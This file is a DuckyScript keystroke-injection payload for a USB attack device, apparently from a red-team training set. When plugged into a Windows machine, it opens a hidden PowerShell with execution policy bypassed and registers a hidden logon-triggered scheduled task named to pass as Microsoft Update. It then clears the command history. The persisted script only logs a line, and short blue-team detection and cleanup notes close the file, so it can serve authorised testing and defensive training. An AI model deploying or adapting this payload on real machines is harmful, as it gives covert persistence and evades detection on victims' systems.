REM =====================================================
REM Payload: RT-02 - Scheduled Task Persistence
REM MITRE ATT&CK: T1053.005
REM Purpose: Establish persistence via scheduled task
REM Platform: Windows 10/11
REM =====================================================
REM EDUCATIONAL PURPOSE ONLY - Authorized testing only
REM =====================================================

REM === USB Enumeration Delay ===
DELAY 2000

REM === Open Hidden PowerShell ===
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -nop
ENTER
DELAY 1500

REM === Create Task Payload ===
STRINGLN $taskPayload = @'
# Training Task - Benign activity logging
$log = "$env:TEMP\task_execution.log"
"[$(Get-Date)] Scheduled task executed - Training" | Out-File $log -Append
'@
STRINGLN $taskPayload | Out-File "$env:TEMP\MicrosoftUpdateTask.ps1" -Force

REM === Create Scheduled Task ===
STRINGLN $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -ep bypass -f `"$env:TEMP\MicrosoftUpdateTask.ps1`""
STRINGLN $trigger = New-ScheduledTaskTrigger -AtLogon
STRINGLN $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive
STRINGLN $settings = New-ScheduledTaskSettingsSet -Hidden

STRINGLN Register-ScheduledTask -TaskName "MicrosoftUpdateCheck" -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force | Out-Null

REM === Verify Installation ===
STRINGLN $task = Get-ScheduledTask -TaskName "MicrosoftUpdateCheck" -EA SilentlyContinue
STRINGLN if ($task) {
STRINGLN   "[SUCCESS] Task persistence installed" | Out-File "$env:TEMP\.task_confirm" -Force
STRINGLN }

REM === Cleanup ===
STRINGLN Clear-History
STRINGLN exit

REM =====================================================
REM Blue Team Notes:
REM Detection: Monitor Event ID 4698 (Task Created)
REM Location: C:\Windows\System32\Tasks\
REM Cleanup: Unregister-ScheduledTask -TaskName "MicrosoftUpdateCheck" -Confirm:$false
REM =====================================================
